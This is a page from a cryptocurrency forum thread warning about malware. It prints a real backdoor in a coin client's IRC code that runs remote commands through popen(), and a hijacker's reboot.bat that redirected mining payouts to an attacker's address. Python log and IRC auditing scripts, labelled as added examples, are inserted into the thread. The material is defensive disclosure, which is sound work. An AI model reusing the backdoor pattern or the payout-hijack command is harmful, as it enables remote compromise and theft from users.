
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 41. (Read 843901 times)

member
Activity: 97
Merit: 10
This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.
sr. member
Activity: 305
Merit: 250
Does the malware affect desktop/laptop computers only? Does it affect iPhone/iOS users?
newbie
Activity: 30
Merit: 0
My ethmining is being hijacked.

Ok so this morning after waking up, one of my rigs was mining on NiceHash, but I was mining on miningpoolhub and didn't specify a failover. In my logs I discovered a reboot.bat file was uploaded through ethman.exe and run remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner? I consider myself paranoid-careful and usually take all precautions. Is this a mistake on my side, or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised, or is it more like someone has my external IP? Will a VPN make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now, and what should I do to ensure further safety? As you can see inside the reboot.bat file, the hacker's bitcoin address "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of Equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time: 00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
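The log excerpt above is something a rig owner can check for automatically. As an added example (not from the post and not Claymore's software), here is a small Python scanner that flags remote-management file transfers and restarts in Claymore-style log lines, and lists any payout address in an uploaded .bat that differs from the owner's; the sample lines and the owner's address are constructed placeholders.

```python
import re
from typing import Iterable

# Placeholder for the rig owner's own payout address (assumption, not from the post).
EXPECTED_WALLET = "1OwnerWalletPlaceholderXXXXXXXXXXXXX"

# Claymore logs remote file transfers and restarts with these fixed phrases.
TRANSFER_RE = re.compile(r"Remote management: file (?P<name>\S+) was (?P<op>uploaded|downloaded)")
RESTART_RE = re.compile(r"Remote management required restart")
# -ewal / -dwal are the payout flags used in the reboot.bat from the post.
WALLET_RE = re.compile(r"-(?:ewal|dwal)\s+(\S+)")


def scan_miner_log(lines: Iterable[str]) -> list[str]:
    """Flag remote-management transfers and restarts; the first token is the timestamp."""
    findings = []
    for line in lines:
        tokens = line.split()
        stamp = tokens[0] if tokens else "?"
        if m := TRANSFER_RE.search(line):
            findings.append(f"{stamp} remote {m.group('op')} of {m.group('name')}")
        if RESTART_RE.search(line):
            findings.append(f"{stamp} remote-triggered restart")
    return findings


def foreign_wallets(bat_text: str, expected: str = EXPECTED_WALLET) -> set[str]:
    """Payout addresses in a miner .bat that are not the owner's."""
    return {w for w in WALLET_RE.findall(bat_text) if w != expected}


# Constructed sample lines, modelled on the excerpt in the post above.
SAMPLE_LOG = [
    "02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded",
    "02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0",
    "02:00:10:232   406c   Remote management: file reboot.bat was uploaded",
    "02:00:13:363   689c   Remote management required restart",
]
SAMPLE_BAT = (
    '"C:\\path\\EthDcrMiner64.exe" -epool stratum+tcp://pool.example:3353 '
    "-ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x "
    "-dpool stratum+tcp://pool.example:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x"
)

if __name__ == "__main__":
    for finding in scan_miner_log(SAMPLE_LOG):
        print(finding)
    print("payout redirected to:", foreign_wallets(SAMPLE_BAT))
```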
legendary
Activity: 1624
Merit: 1001
All cryptos are FIAT digital currency. Do not use.
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread makes me more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi-professional hackers.

You know it.. and so did "Satoshi"..

He/they are cryptoFIAT banking on it. (pun intended)
sr. member
Activity: 313
Merit: 258
I recommend using Linux for any PC running a full node; Linux is much more secure than Windows.

The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner: not others, not the group, only the owner of the account.

Then create a separate account for your regular usage. That way, in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node; this way your bitcoins, litecoins, dash, etc. will be safe.

For extra security Trezor and Ledger Nano S are the best.

Both are great hardware wallets, and both have features that are missing on the other wallet: Trezor has support for a password manager, and Ledger has support for litecoins.

I recommend having both; for traveling by plane the Ledger has the advantage that it looks like a USB stick.
sr. member
Activity: 686
Merit: 261
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread makes me more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi-professional hackers.
sr. member
Activity: 588
Merit: 351
I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread makes me more aware of malware. One time I also got victimized by malware and I didn't know where it came from. Sadly, more expenses to cure it.
hero member
Activity: 1190
Merit: 568
Sovryn - Brings DeFi to Bitcoin
Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean the wallets are, but it's not Kaspersky enough?
If not, why do we need to protect against the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coin ones) like DOGE, LTC, BTC and a few more.

We need to be vigilant in all our actions. We should look at the link above the browser every time we are opening it. Hackers may hack our account by fooling us. Sometimes they are creating websites that look the same as the legit ones; just look at the link very carefully to avoid problems.
newbie
Activity: 8
Merit: 0
Thanks for sharing! I've added some of these malicious sites to CoinJabber.com, a place for users to rate and review cryptocurrency sites... Basically Yelp for crypto.

https://www.coinjabber.com/
member
Activity: 97
Merit: 10
Does this include the malware I've seen that changes any bitcoin address you copy to your clipboard to an unsavory character's bitcoin address? When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice!
sr. member
Activity: 1484
Merit: 253
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting your computer regularly isn't a good habit at all. You are just shortening the life span of your personal computer, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there that can't help their fingers but click suspicious links: never believe people who are posting some links.

Oh, I see more optional solutions to help a lot of problems raised on this thread, but you're right, it's not really good to format your PC immediately just to give up solving the malware infection while the OS is still running. To preserve the lifespan of your computer you must download the most reliable PC security that would take away all the worries you have, and I can recommend ESET NOD32 antivirus, the latest version now available if you search on their site online; even the trial version works totally fine.
legendary
Activity: 4354
Merit: 3614
what is this "brake pedal" you speak of?
Formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. It's one of the surest ways of getting rid of a suspected virus/malware.

If you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce their effective lifespan; most will be long obsolete before they wear out.

Whenever I set a new rig (mining or otherwise) up, I image the OS as soon as it's patched up and all essential programs are installed. That way all I need to do to go to a new, clean baseline OS is a one-shot restore that takes minutes.
hero member
Activity: 3136
Merit: 591
Leading Crypto Sports Betting & Casino Platform
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting your computer regularly isn't a good habit at all. You are just shortening the life span of your personal computer, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there that can't help their fingers but click suspicious links: never believe people who are posting some links.
member
Activity: 62
Merit: 10
THANK YOU FOR THE INFORMATION MY FRIEND
legendary
Activity: 2156
Merit: 1131
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
newbie
Activity: 7
Merit: 0
Thank you .. I think it is very good information for me as a beginner. I will always support you.
hero member
Activity: 1372
Merit: 564
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Fires on any IRC message whose fourth word is ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The line from the fifth word onward is handed straight to the shell
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Reply target: the sender's nick, taken from ":nick!user@host"
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Command output goes back to the sender over IRC
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


Thanks for informing us; however, we must know how to avoid this. We all give importance to bitcoin, therefore we must take care of it. There are some kinds of people that want to earn bitcoin without putting some effort into it; they just want to take it from others easily. Secure your browsers, don't click anything that is not important, looks may be deceiving, brothers.
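To audit captured IRC traffic for messages that would have fired the handler quoted above, here is an added example in Python (not the coin's code and not from the post): it re-creates the trigger condition and the strstr() slicing, reports what popen() would have received, and executes nothing. The sample lines, nicks and channel are constructed.

```python
from typing import Iterable, Optional, Tuple


def backdoor_trigger(raw_line: str) -> Optional[Tuple[str, str]]:
    """Mirror the backdoored handler's check without running anything.

    The client splits a raw IRC line on single spaces into vWords.  The handler fires
    when vWords[1] == "PRIVMSG", vWords[3] == ":!" and vWords[0] is longer than one
    character, then hands strstr(strLine, vWords[4]) -- the line from the first
    occurrence of the fifth word onward -- to popen() and sends the output back to
    the nick in vWords[0].  Returns (nick, text_that_would_be_executed) or None.
    """
    words = raw_line.split(" ")
    if len(words) < 5:
        return None
    if words[1] != "PRIVMSG" or words[3] != ":!" or len(words[0]) <= 1:
        return None
    # pszName = vWords[0] + 1, cut at the first '!' -> the sender's nick
    nick = words[0][1:].split("!", 1)[0]
    # strstr() finds the *first* occurrence, which may lie before the command
    # if the fifth word also appears in the prefix; an empty needle matches offset 0
    idx = raw_line.find(words[4])
    return nick, raw_line[idx:]


def audit_irc_log(lines: Iterable[str]) -> list:
    """Return every (nick, command) pair that would have triggered the backdoor."""
    hits = []
    for line in lines:
        hit = backdoor_trigger(line.rstrip("\r\n"))
        if hit:
            hits.append(hit)
    return hits


# Constructed sample traffic; channel, nicks and commands are placeholders.
SAMPLE_IRC = [
    "PING :irc.example.invalid",
    ":alice!~a@host1 PRIVMSG #coinchan :hello everyone",
    ":mallory!~m@host2 PRIVMSG #coinchan :! uname -a",
    ":bob!~b@host3 PRIVMSG #coinchan :!not a trigger, no space after the bang",
]

if __name__ == "__main__":
    for nick, cmd in audit_irc_log(SAMPLE_IRC):
        print(f"backdoor trigger from {nick}: would run {cmd!r}")
```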
legendary
Activity: 1894
Merit: 1001
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!

There is no comprehensive overall protection; think, rather, in layers. A VPN, a good antivirus, Spybot S&D, hosts file (HostsMan), Sandboxie, a virtual machine should all be in place.

  Avoid Win 10.
  If you use 7, 8, or 8.1, remove or do not install the Microsoft spyware.
   Even better, use Mac or Linux.

There is freeware available to do all this.
newbie
Activity: 10
Merit: 0
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the OP is referring to in this post, especially with respect to malicious file downloads? Thanks!
hero member
Activity: 1708
Merit: 606
Buy The F*cking Dip
Is there any good antivirus to handle it?

I would like to ask this same question here. Can anyone cite a software/site that can provide a better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert malware, but it wouldn't hurt if we can install a program that has a good reputation in stopping malware getting inside our machines.